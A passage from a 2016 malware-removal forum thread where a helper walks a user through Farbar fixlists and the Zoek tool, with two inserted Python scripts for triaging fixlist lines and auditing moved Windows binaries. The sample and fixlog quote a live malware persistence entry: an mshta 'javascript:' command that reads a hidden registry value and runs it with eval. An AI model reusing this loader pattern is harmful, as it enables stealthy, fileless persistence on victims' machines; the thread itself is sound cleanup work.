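    findings = []
    for n, line in enumerate(text.strip().splitlines(), 1):
        reasons = triage_line(line.strip())
        if reasons:
            findings.append((n, reasons))
    return findings


# Lines 1-5 are copied from the fixlist above; lines 6-7 are constructed
# benign entries used to show what is NOT flagged.
SAMPLE = r'''
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
HKU\S-1-5-21-0-0-0-1000\...\Run: [Example Updater] => "C:\Program Files\Example\updater.exe"
ShortcutTarget: notes.lnk -> C:\Program Files (x86)\Example\notes.exe (Example Vendor)
'''

if __name__ == "__main__":
    for number, rules in triage(SAMPLE):
        print(number, ", ".join(rules))
```
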

#3 pkight


Posted 06 November 2016 - 04:29 PM

Finished all the tasks and the fixlog.txt is listed below.  

 

The "svchost" is still running about 50% of the cpu.  The "regsvr32" is not showing up on Task Manager now.  

 

Here is the fixlog.txt:

 

Fix result of Farbar Recovery Scan Tool (x86) Version: 06-11-2016
Ran by Pat (06-11-2016 10:41:30) Run:1
Running from C:\Users\Pat\Documents\Documents\Documents\Downloads
Loaded Profiles: Pat (Available Profiles: Pat)
Boot Mode: Normal
 
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [] => [X]
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\...\Run: [**uxetnbtsu<*>] => "C:\Users\Pat\AppData\Local\d102cc\256774.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll => No File
Toolbar: HKU\S-1-5-21-598873941-3244639055-2830076859-1000 -> No Name - {A057A204-BACC-4D26-9990-79A187E2698E} -  No File
FF Plugin: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files\Picasa2\npPicasa2.dll [No File]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
S2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [X]
S2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [X]
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.135\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.99\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.57\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.69\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.2.183.39\goopdate.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.79\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.7\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.1\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.145\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.123\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.153\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.149\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.22.3\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.165\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}\localserver32 -> C:\Users\Pat\AppData\Local\Temp\{e9513610-f218-4dda-b954-2c7e6ba7cabb}\IDriver.NonElevated.exe => No (the data entry has 5 more characters).
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.26.9\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.115\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.28.15\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.65\psuser.dll => No File
CustomCLSID: HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}\InprocServer32 -> C:\Users\Pat\AppData\Local\Google\Update\1.3.21.111\psuser.dll => No File
Task: {53D7B34F-D449-492F-8394-5B7E046BF41C} - \WSE_Astromenda -> No File <==== ATTENTION
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9: "C:\Windows\system32\mshta.exe" "javascript:aps4zK="dn4";l4n5=new ActiveXObject("WScript.Shell");rgvJb3="j";K3xch=l4n5.RegRead("HKCU\\software\\hqygkpubh\\wpazikr");Drh9rf6="en";eval(K3xch);UMuvaG1="MeHHMcMF";" <===== ATTENTION
DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Crypted
FirewallRules: [{79EDF414-9663-4A80-B368-517149062D16}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
FirewallRules: [{65A496F2-7E8F-4B44-B0F1-8780C8544656}] => (Allow) C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\dtUser.exe
C:\Users\Pat\AppData\Local\Temp\a.txt
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk
C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully.
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**uxetnbtsu<*> => value removed successfully.
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk => moved successfully
C:\Windows\System32\mshta.exe => moved successfully
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk => moved successfully
C:\Windows\System32\cmd.exe => moved successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
"HKLM\SOFTWARE\Policies\Google" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => key removed successfully.
"HKCR\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9}" => key removed successfully.
HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{A057A204-BACC-4D26-9990-79A187E2698E} => value removed successfully.
HKCR\CLSID\{A057A204-BACC-4D26-9990-79A187E2698E} => key not found. 
"HKLM\Software\MozillaPlugins\@google.com/npPicasa2,version=2.0.0" => key removed successfully.
C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => moved successfully
Net Driver HPZ12 => service removed successfully.
Pml Driver HPZ12 => service removed successfully.
blbdrive => service removed successfully.
IpInIp => service removed successfully.
NwlnkFlt => service removed successfully.
NwlnkFwd => service removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{095A2EEC-F7FE-42E8-96FB-C20E53081908}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{0E55CBE1-B06A-49B6-AD8D-9EFAA0160C6F}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{218D2740-5A50-42A8-AB9F-62FF1B168782}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{29A96789-9595-4947-BEDB-0FCC776F7DB8}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{320F0FDB-BE0A-4648-9D18-4A2C3448C007}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{38216570-5DB1-45F8-A344-B0C4E252B14B}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{b2b568c8-3712-4a75-b806-4b3c2fdb06d5}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{C5A2122B-A05B-4FD8-AE49-91990AE10998}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{DB25D157-76D4-41C1-97B5-359E4A4CECEB}" => key removed successfully.
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000_Classes\CLSID\{FB994D36-B312-46CE-A40B-CF63980641F9}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{53D7B34F-D449-492F-8394-5B7E046BF41C}" => key removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53D7B34F-D449-492F-8394-5B7E046BF41C}" => key removed successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WSE_Astromenda => key not found. 
"HKU\S-1-5-21-598873941-3244639055-2830076859-1000\Software\Classes\a042f9" => key removed successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Crypted => key removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{79EDF414-9663-4A80-B368-517149062D16} => value removed successfully.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{65A496F2-7E8F-4B44-B0F1-8780C8544656} => value removed successfully.
"C:\Users\Pat\AppData\Local\Temp\a.txt" => not found.
"C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk" => not found.
"C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk" => not found.
"C:\Users\Pat\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 8388608 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10794893 B
Java, Flash, Steam htmlcache => 4649 B
Windows/system/drivers => 1753129 B
Edge => 0 B
Chrome => 532212267 B
Firefox => 0 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 392553 B
LocalService => 66228 B
NetworkService => 38187039 B
Pat => 3609742379 B
 
RecycleBin => 86065 B
EmptyTemp: => 3.9 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 10:46:21 ====
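
Added example, not part of the original post: the Fixlog above lists C:\Windows\System32\mshta.exe and C:\Windows\System32\cmd.exe as "moved successfully", each right after the Startup shortcut that pointed at it. Both are Windows components (batch files, for instance, are run by cmd.exe), so the Python below audits a Fixlog for moved executables under C:\Windows and maps each one back to the fixlist line that named it. The function name and the extension list are assumptions of this example; the sample is a trimmed excerpt of the log above.

```python
import re

# A result line of the form:  <path> => moved successfully
MOVED = re.compile(r'^"?(?P<path>[A-Za-z]:\\.+?)"? => moved successfully$')
# Assumption: an executable image anywhere under C:\Windows is an OS component.
OS_BINARY = re.compile(r"^[A-Za-z]:\\Windows\\.+\.(exe|dll|sys)$", re.IGNORECASE)


def audit_fixlog(text):
    """Map each moved OS binary to the fixlist directives that mention it.

    The Fixlog echoes the fixlist between the lines "start" and "End" and
    then lists one result per line; both parts are read from the same text.
    """
    lines = [ln.strip() for ln in text.splitlines()]
    if "start" in lines and "End" in lines:
        start, end = lines.index("start"), lines.index("End")
        directives = lines[start + 1:end]
        results = lines[end + 1:]
    else:
        # No echoed fixlist: treat every line as a result line.
        directives, results = [], lines

    findings = {}
    for ln in results:
        m = MOVED.match(ln)
        if m and OS_BINARY.match(m.group("path")):
            path = m.group("path")
            findings[path] = [d for d in directives if path.lower() in d.lower()]
    return findings


# Trimmed excerpt of the Fixlog posted above (lines copied, others omitted).
FIXLOG_EXCERPT = r'''
fixlist content:
*****************
start
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk [2016-11-04]
ShortcutTarget: bccb5d.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk [2016-09-22]
ShortcutTarget: d921d0.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction ? <======= ATTENTION
End
*****************
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bccb5d.lnk => moved successfully
C:\Windows\System32\mshta.exe => moved successfully
C:\Users\Pat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d921d0.lnk => moved successfully
C:\Windows\System32\cmd.exe => moved successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
'''

if __name__ == "__main__":
    for binary, causes in audit_fixlog(FIXLOG_EXCERPT).items():
        print("moved OS binary:", binary)
        for directive in causes:
            print("   named by:", directive)
```
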


#4 nasdaq


Posted 07 November 2016 - 09:39 AM

Temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications: How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download Zoek tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
createsrpoint;
autoclean;
emptyclsid;
emptyffcache;
FFdefaults;
emptyiecache;
iedefaults;
emptychrcache;
CHRdefaults;
emptyalltemp;
emptyfolderscheck;delete
ipconfig /flushdns;b
Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.

#5 pkight


Posted 07 November 2016 - 01:19 PM

When I try to open the zoek.exe I get the following error message:

 

Windows can not find 'C:\Users\Pat\AppData\Local\Temp\4637.tmp\zoek-install.bat'  Make sure you type the name correctly, and try again.



#6 nasdaq


Posted 08 November 2016 - 09:43 AM

Make sure that the Zoek program is on your desktop and run it from there as an Administrator.

#7 pkight


Posted 08 November 2016 - 12:58 PM

Same results.  Is it compatible with Vista?


Edited by pkight, 08 November 2016 - 01:14 PM.


#8 nasdaq


Posted 09 November 2016 - 09:47 AM

http://www.winhelponline.com/articles/105/1/


I suspect that the file association for the .bat file is corrupted.

Fix it. Download the bat file suggested here.

http://www.winhelponline.com/blog/file-association-fixes-for-windows-vista/

Execute it as suggested on the page.

Restart the computer when done.

Try to run the Zoek program as an administrator now.

#9 pkight


Posted 09 November 2016 - 01:52 PM

This time the following error message appears:

 

Windows can not find 'C:\Users\Pat\AppData\Local\Temp\7cFc.tmp\zoek-install.bat'  Make sure you type the name correctly, and try again.



#10 nasdaq


Posted 10 November 2016 - 09:29 AM


It's not a file association issue. Let's check the PATH.

Refer to this page.
http://www.computerhope.com/issues/ch000549.htm

Note the PATH string listed in the System variable box.
Post it for my review.

Also, let's check the location of these files.

Please run the Farbar Recovery Scan Tool. Enter zoek-install.bat;Zoek.exe in the Search Box and hit the File Search button.
Post the content of the Search.txt in your next reply.

#11 pkight


Posted 10 November 2016 - 05:16 PM

.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip

 

 

 

 

Farbar Recovery Scan Tool (x86) Version: 06-11-2016
Ran by Pat (10-11-2016 14:08:40)
Running from c:\Users\Pat\Documents\Documents\Documents\Downloads
Boot Mode: Normal
 
================== Search Files: "zoek-install.bat;Zoek.exe" =============
 
C:\Users\Pat\Documents\Documents\Documents\Downloads\zoek.exe
[2016-11-08 10:13][2016-11-08 10:13] 1309184 ____A () 7EA0260488F304D68067A50B33A23AC2 [File not signed]
 
C:\Users\Pat\Documents\Documents\Documents\Documents\Documents\Desktop\zoek.exe
[2016-11-07 10:09][2016-11-07 10:09] 1309184 ____A () 7EA0260488F304D68067A50B33A23AC2 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\CEF8.tmp\zoek-install.bat
[2016-11-08 10:01][2016-11-08 10:01] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\A5E5.tmp\zoek-install.bat
[2016-11-08 10:13][2016-11-08 10:13] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\A0F5.tmp\zoek-install.bat
[2016-11-08 09:55][2016-11-08 09:55] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\9C06.tmp\zoek-install.bat
[2016-11-08 09:54][2016-11-08 09:54] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\936E.tmp\zoek-install.bat
[2016-11-08 09:58][2016-11-08 09:58] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\85C2.tmp\zoek-install.bat
[2016-11-09 10:52][2016-11-09 10:52] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\7CFC.tmp\zoek-install.bat
[2016-11-09 10:47][2016-11-09 10:47] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\7242.tmp\zoek-install.bat
[2016-11-09 10:16][2016-11-09 10:16] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\6B25.tmp\zoek-install.bat
[2016-11-07 10:10][2016-11-07 10:10] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\6A3B.tmp\zoek-install.bat
[2016-11-07 10:11][2016-11-07 10:11] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\5AF1.tmp\zoek-install.bat
[2016-11-08 09:51][2016-11-08 09:51] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\4637.tmp\zoek-install.bat
[2016-11-07 10:13][2016-11-07 10:13] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
C:\Users\Pat\AppData\Local\Temp\1A28.tmp\zoek-install.bat
[2016-11-07 10:11][2016-11-07 10:11] 0005877 ____A () 4F6497F0C04D1A226982A1CAF1C85666 [File not signed]
 
====== End of Search ======


#12 nasdaq


Posted 11 November 2016 - 09:26 AM


If this is the only string in your PATH it's been corrupted.

.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip

Check again.

Refer to the Environment Variable image on this page.
http://www.computerhope.com/issues/ch000549.htm

Open the Environment Variable on your Computer as you did before.

Make sure the PATH variable is highlighted (has the focus).

Click the Edit button.

Now you should be able to see the complete string.

Make a note of it.

Do not change anything; just press the CLOSE button when finished.

Please post the string for my review.

===

#13 pkight


Posted 11 November 2016 - 09:45 AM

CLASSPATH

 

.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip



#14 nasdaq


Posted 11 November 2016 - 10:16 AM


Are you working in a Linux environment, or a virtual machine?

I take it that you only have a CLASSPATH?
That the variable PATH is not available.

FYI and mine.
http://www.java67.com/2012/08/what-is-path-and-classpath-in-java-difference.html

#15 pkight


Posted 11 November 2016 - 01:54 PM

Sorry about that. I didn't scroll down far enough to see the PATH.

 

PATH

C:\Program Files\Common Files\Microsoft Shared\Windows Live;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Intel\DMIX;C:\Program Files\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\DLLShared\;C:\Program Files\Common Files\Roxio Shared\9.0\DLLShared\;C:\Program Files\Common Files\HP\Digital Imaging\\bin;C:\Program Files\jZip;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%PROGRAMFILES%\Internet Explorer;C:\Program Files\QuickTime\QTSystem\;C:\Program Files\Windows Live\Shared





